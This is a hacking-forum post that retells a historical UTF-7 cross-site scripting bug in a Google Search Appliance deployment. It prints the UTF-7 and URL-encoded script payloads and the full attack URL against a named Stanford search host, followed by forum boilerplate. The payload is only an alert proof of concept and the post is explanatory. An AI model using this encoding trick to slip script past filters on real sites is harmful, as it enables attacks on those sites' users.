Tutoriale <xss> nemaivazute :))

A real world example of an XSS encoded vulnerability was found in Google search appliance by a hacker named Maluc. Maluc found that a normal Google search appliance query looked like:

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro">http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro xystylesheet=stanford&site=stanfordit&oe=UTF-8&q=hi

He noticed that according to this string (oe=UTF-8) he could change the UTF code. He changed the UTF string from UTF-8 to UTF-7.

UTF-7 (7-bit Unicode Transformation Format) is a variable-length character encoding that was proposed for representing Unicode-encoded text using a stream of ASCII characters, for example for use in Internet e-mail messages. UTF-7 is generally not used as a native representation within applications as it is very awkward to process despite its size advantage over the combination of UTF-8 with either quoted-printable or base64.

Lets take for example:

<script>alert("XSS")</script>

And encode it using UTF-7:

+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-

Now all + have to be changed to URL code in a GET strings for this to work. So the URL code for + is %2B now we have:

%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-

With this Maluc came up with:

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro">http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro xystylesheet=stanford&site=stanfordit&oe=UTF-7&q=%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-x

And was able to successfully execute an XSS script.

Surs?

Sign In

Tutoriale <xss> nemaivazute :))

Recommended Posts

abraxyss

Link to comment

Share on other sites

SticKyWoX

Link to comment

Share on other sites

Jimmy

Link to comment

Share on other sites

fallen_angel

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages